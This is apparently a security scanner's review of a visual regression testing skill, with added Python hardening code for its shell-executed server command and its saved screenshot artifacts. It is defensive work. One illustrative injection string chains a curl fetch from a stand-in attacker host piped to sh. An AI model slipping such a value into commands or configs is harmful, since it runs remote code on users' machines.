Visual Qa
Security checks across static analysis, malware telemetry, and agentic risk
Overview
This appears to be a coherent visual regression testing skill; its main risks are the local dependency setup it expects, the optional server command it executes, and the screenshot and diff artifacts it saves into the project.
This skill looks appropriate for visual regression testing. Before installing or using it, run dependency installs in a controlled environment, review any configured server command before execution, and treat generated screenshots/diffs as potentially sensitive project artifacts.
Static analysis
No static analysis findings were reported for this release.
VirusTotal
VirusTotal findings are pending for this skill version.
Risk analysis
Artifact-based informational review of SKILL.md, metadata, install specs, static scan signals, and capability signals. ClawScan does not execute the skill or run runtime probes.
If you run the server option, the configured command can execute with your local user permissions.
The skill can start a local development server by executing a caller/config-provided command through the shell. This is expected for visual QA workflows, but it is still broad local command execution.
import subprocess

# command comes from the --server option or the config file's server value
process = subprocess.Popen(
    command,
    shell=True,
)
Only use the --server option or config server value with commands you trust, especially when running this in an unfamiliar repository.
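The pattern above hands a caller-supplied string to a shell, so anything a config file can express (command chaining, substitution, redirection) runs as the local user. The following is an added example, not code from the skill or from ClawScan, showing how a gate could launch the same dev server without a shell: it splits the string with shlex, checks the executable against an allowlist, and rejects arguments that carry shell metacharacters. The allowlist contents, the function names, and the refusal policy are assumptions for illustration.

```python
import shlex
import subprocess
from typing import Optional, Sequence

# Hypothetical allowlist of launchers a visual-QA gate is expected to run.
# Tighten or extend it per project; it is an assumption, not the skill's config.
ALLOWED_EXECUTABLES = {"npm", "npx", "pnpm", "yarn", "node", "python", "python3"}

# Characters that only mean something to a shell. With shell=False they are
# passed literally, but their presence signals the author expected a shell.
SHELL_METACHARS = ";|&`$<>()"


def parse_server_command(command: str) -> list:
    """Split a --server / config command into argv without invoking a shell."""
    argv = shlex.split(command)
    if not argv:
        raise ValueError("empty server command")
    return argv


def check_server_command(argv: Sequence[str],
                         allowed=ALLOWED_EXECUTABLES) -> Optional[str]:
    """Return None when argv is acceptable, otherwise a human-readable reason."""
    exe = argv[0].rsplit("/", 1)[-1]  # compare the basename, allow ./node_modules/.bin/… style paths
    if exe not in allowed:
        return f"executable {exe!r} is not in the allowlist"
    for arg in argv[1:]:
        if any(ch in arg for ch in SHELL_METACHARS):
            return f"argument {arg!r} contains shell metacharacters"
    return None


def start_server(command: str, cwd: str = ".") -> subprocess.Popen:
    """Launch the dev server with shell=False after the checks above pass."""
    argv = parse_server_command(command)
    reason = check_server_command(argv)
    if reason is not None:
        raise PermissionError(f"refusing to start server: {reason}")
    return subprocess.Popen(argv, cwd=cwd, shell=False)
```

A string such as `npm run dev; curl http://attacker/x | sh` is still split into tokens, but the token `dev;` trips the metacharacter check and the gate refuses to start rather than silently running `npm` with odd arguments. Projects whose dev server genuinely needs a shell feature (environment expansion, pipes) should express that in a script file the allowlist permits, not in the config string.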
Installing dependencies may download and run third-party package/browser code in your environment.
The skill documents manual installation of external Python packages and a Chromium browser download, while the registry metadata has no install spec or required binaries. This setup is purpose-aligned but not pinned or declared in install metadata.
pip install playwright pillow
python -m playwright install chromium
Install dependencies in a project virtual environment or CI image you control, and pin versions if reproducible builds matter.
Screenshots and diff images can preserve sensitive UI, test data, or customer-like information in the project workspace.
The gate saves diff images to a persistent project directory when tests fail, and the capture workflow also writes screenshot baselines. These artifacts are expected for visual regression testing but may contain page content.
import os
import subprocess

keep_diff_dir = '.visual-qa/diffs'
os.makedirs(keep_diff_dir, exist_ok=True)
subprocess.run(['cp', '-r', f'{diff_dir}/.', keep_diff_dir])
Avoid capturing sensitive sessions or production data, and add .visual-qa outputs to .gitignore unless you intentionally want to commit them.
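The two recommendations above (keep captures away from production data, keep .visual-qa out of version control) can be enforced in the gate itself rather than left to memory. The following is an added example, not code from the skill or from ClawScan: it refuses capture URLs that do not point at a local host, persists diffs with shutil instead of shelling out to cp, and appends an idempotent .gitignore entry. The local-host set, the function names, and the demo() fixture are assumptions for illustration.

```python
import shutil
import tempfile
from pathlib import Path
from urllib.parse import urlparse

OUTPUT_DIR = ".visual-qa"                                   # directory the skill's gate writes into
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1", "0.0.0.0"}  # assumed-safe capture targets


def is_local_target(url: str) -> bool:
    """True when a capture URL points at a local dev server rather than a shared host."""
    host = (urlparse(url).hostname or "").lower()
    return host in LOCAL_HOSTS or host.endswith(".localhost")


def keep_diffs(diff_dir: Path, project_root: Path) -> list:
    """Persist failing diff images under .visual-qa/diffs without a cp subprocess.
    Returns the names of the files now present in the kept directory."""
    dest = project_root / OUTPUT_DIR / "diffs"
    dest.mkdir(parents=True, exist_ok=True)
    shutil.copytree(diff_dir, dest, dirs_exist_ok=True)
    return sorted(p.name for p in dest.iterdir() if p.is_file())


def ensure_gitignored(project_root: Path, pattern: str = OUTPUT_DIR + "/") -> bool:
    """Append pattern to .gitignore unless an equivalent entry exists.
    Returns True when a line was added, False when it was already present."""
    gitignore = project_root / ".gitignore"
    text = gitignore.read_text() if gitignore.exists() else ""
    present = {line.strip().rstrip("/") for line in text.splitlines()}
    if pattern.rstrip("/") in present:
        return False
    if text and not text.endswith("\n"):
        text += "\n"
    gitignore.write_text(text + pattern + "\n")
    return True


def demo() -> dict:
    """Exercise the helpers on a constructed temporary project and report the outcome."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "project"
        diffs = Path(tmp) / "run-diffs"
        root.mkdir()
        diffs.mkdir()
        # constructed placeholder bytes standing in for a real diff image
        (diffs / "home.diff.png").write_bytes(b"\x89PNG fake")
        # pre-existing .gitignore with no trailing newline, to exercise the append path
        (root / ".gitignore").write_text("node_modules/")
        copied = keep_diffs(diffs, root)
        first = ensure_gitignored(root)
        second = ensure_gitignored(root)   # second call must be a no-op
        gitignore_text = (root / ".gitignore").read_text()
    return {"copied": copied, "first": first, "second": second, "gitignore": gitignore_text}
```

Calling is_local_target before each capture is a cheap guard against pointing the gate at a staging or production host whose pages carry customer-like data; the .gitignore step makes the kept diffs and baselines an explicit commit decision rather than an accident of `git add -A`.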
